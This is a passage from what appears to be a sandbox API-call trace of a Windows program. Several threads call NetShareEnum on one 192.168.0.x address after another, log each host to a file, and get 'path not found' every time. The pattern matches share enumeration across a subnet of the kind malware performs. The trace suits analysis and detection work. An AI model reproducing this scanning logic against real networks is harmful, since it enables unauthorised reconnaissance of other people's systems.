cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.363] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.173", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.173", lpUsedDefaultChar=0x0) returned 15 [0178.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x429ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.363] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.363] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x429ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.363] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.363] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.363] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x429fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x429fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.367] NetShareEnum (in: servername="\\\\192.168.0.173", level=0x1, bufptr=0x429fedc, prefmaxlen=0xffffffff, entriesread=0x429fed4, totalentries=0x429fed0, resume_handle=0x429fecc | out: bufptr=0x429fedc, entriesread=0x429fed4, totalentries=0x429fed0, resume_handle=0x429fecc) returned 0x35 [0211.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.205", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.205", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.205", lpUsedDefaultChar=0x0) returned 15 [0211.154] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x429ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.154] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x429ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.154] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x429fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x429fc54*=0x33, lpOverlapped=0x0) returned 1 [0211.246] NetShareEnum (in: servername="\\\\192.168.0.205", level=0x1, bufptr=0x429fedc, prefmaxlen=0xffffffff, entriesread=0x429fed4, totalentries=0x429fed0, resume_handle=0x429fecc | out: bufptr=0x429fedc, entriesread=0x429fed4, totalentries=0x429fed0, resume_handle=0x429fecc) returned 0x35 [0257.938] SetEvent (hEvent=0x1dc) returned 1 [0257.938] RtlExitUserThread (Status=0x0) Thread: id = 47 os_tid = 0xc4c [0088.501] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.26", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.501] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.26", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.26", lpUsedDefaultChar=0x0) returned 14 [0088.501] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x43dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.501] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.501] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.501] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x43dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.501] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.502] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.502] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x43dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x43dfc54*=0x10, lpOverlapped=0x0) returned 1 [0088.502] NetShareEnum (in: servername="\\\\192.168.0.26", level=0x1, bufptr=0x43dfedc, prefmaxlen=0xffffffff, entriesread=0x43dfed4, totalentries=0x43dfed0, resume_handle=0x43dfecc | out: bufptr=0x43dfedc, entriesread=0x43dfed4, totalentries=0x43dfed0, resume_handle=0x43dfecc) returned 0x35 [0144.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.93", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.93", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.93", lpUsedDefaultChar=0x0) returned 14 [0144.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x43dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.263] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.263] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x43dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.263] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.263] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.263] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x43dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x43dfc54*=0x10, lpOverlapped=0x0) returned 1 [0144.267] NetShareEnum (in: servername="\\\\192.168.0.93", level=0x1, bufptr=0x43dfedc, prefmaxlen=0xffffffff, entriesread=0x43dfed4, totalentries=0x43dfed0, resume_handle=0x43dfecc | out: bufptr=0x43dfedc, entriesread=0x43dfed4, totalentries=0x43dfed0, resume_handle=0x43dfecc) returned 0x35 [0178.369] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.174", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.369] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.174", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.174", lpUsedDefaultChar=0x0) returned 15 [0178.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x43dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.369] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.369] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x43dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.369] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.369] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.369] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x43dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x43dfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.376] NetShareEnum (in: servername="\\\\192.168.0.174", level=0x1, bufptr=0x43dfedc, prefmaxlen=0xffffffff, entriesread=0x43dfed4, totalentries=0x43dfed0, resume_handle=0x43dfecc | out: bufptr=0x43dfedc, entriesread=0x43dfed4, totalentries=0x43dfed0, resume_handle=0x43dfecc) returned 0x35 [0211.155] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.206", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.155] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.206", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.206", lpUsedDefaultChar=0x0) returned 15 [0211.155] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x43dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.155] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.155] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.155] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x43dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.155] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.155] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.155] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x43dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x43dfc54*=0x11, lpOverlapped=0x0) returned 1 [0211.161] NetShareEnum (in: servername="\\\\192.168.0.206", level=0x1, bufptr=0x43dfedc, prefmaxlen=0xffffffff, entriesread=0x43dfed4, totalentries=0x43dfed0, resume_handle=0x43dfecc | out: bufptr=0x43dfedc, entriesread=0x43dfed4, totalentries=0x43dfed0, resume_handle=0x43dfecc) returned 0x35 [0257.951] SetEvent (hEvent=0x1dc) returned 1 [0257.951] RtlExitUserThread (Status=0x0) Thread: id = 48 os_tid = 0xc50 [0088.503] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.27", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.503] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.27", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.27", lpUsedDefaultChar=0x0) returned 14 [0088.503] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x451ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.503] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.503] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.503] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x451ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.503] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.503] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.503] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x451fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x451fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.504] NetShareEnum (in: servername="\\\\192.168.0.27", level=0x1, bufptr=0x451fedc, prefmaxlen=0xffffffff, entriesread=0x451fed4, totalentries=0x451fed0, resume_handle=0x451fecc | out: bufptr=0x451fedc, entriesread=0x451fed4, totalentries=0x451fed0, resume_handle=0x451fecc) returned 0x35 [0144.272] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.94", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.272] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.94", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.94", lpUsedDefaultChar=0x0) returned 14 [0144.272] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x451ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.272] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.272] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.272] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x451ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.272] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.272] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.272] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x451fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x451fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.276] NetShareEnum (in: servername="\\\\192.168.0.94", level=0x1, bufptr=0x451fedc, prefmaxlen=0xffffffff, entriesread=0x451fed4, totalentries=0x451fed0, resume_handle=0x451fecc | out: bufptr=0x451fedc, entriesread=0x451fed4, totalentries=0x451fed0, resume_handle=0x451fecc) returned 0x35 [0178.314] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.166", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.314] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.166", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.166", lpUsedDefaultChar=0x0) returned 15 [0178.314] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x451ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.314] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.314] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.314] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x451ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.314] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.314] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.314] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x451fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x451fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.318] NetShareEnum (in: servername="\\\\192.168.0.166", level=0x1, bufptr=0x451fedc, prefmaxlen=0xffffffff, entriesread=0x451fed4, totalentries=0x451fed0, resume_handle=0x451fecc | out: bufptr=0x451fedc, entriesread=0x451fed4, totalentries=0x451fed0, resume_handle=0x451fecc) returned 0x35 [0211.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.237", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.237", cchWideChar=15, lpMultiByteStr=0x1e8314c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.237", lpUsedDefaultChar=0x0) returned 15 [0211.206] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x451fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x451fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x451ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.345] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.345] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x451ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.346] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.346] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.346] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x451fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x451fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.349] NetShareEnum (in: servername="\\\\192.168.0.237", level=0x1, bufptr=0x451fedc, prefmaxlen=0xffffffff, 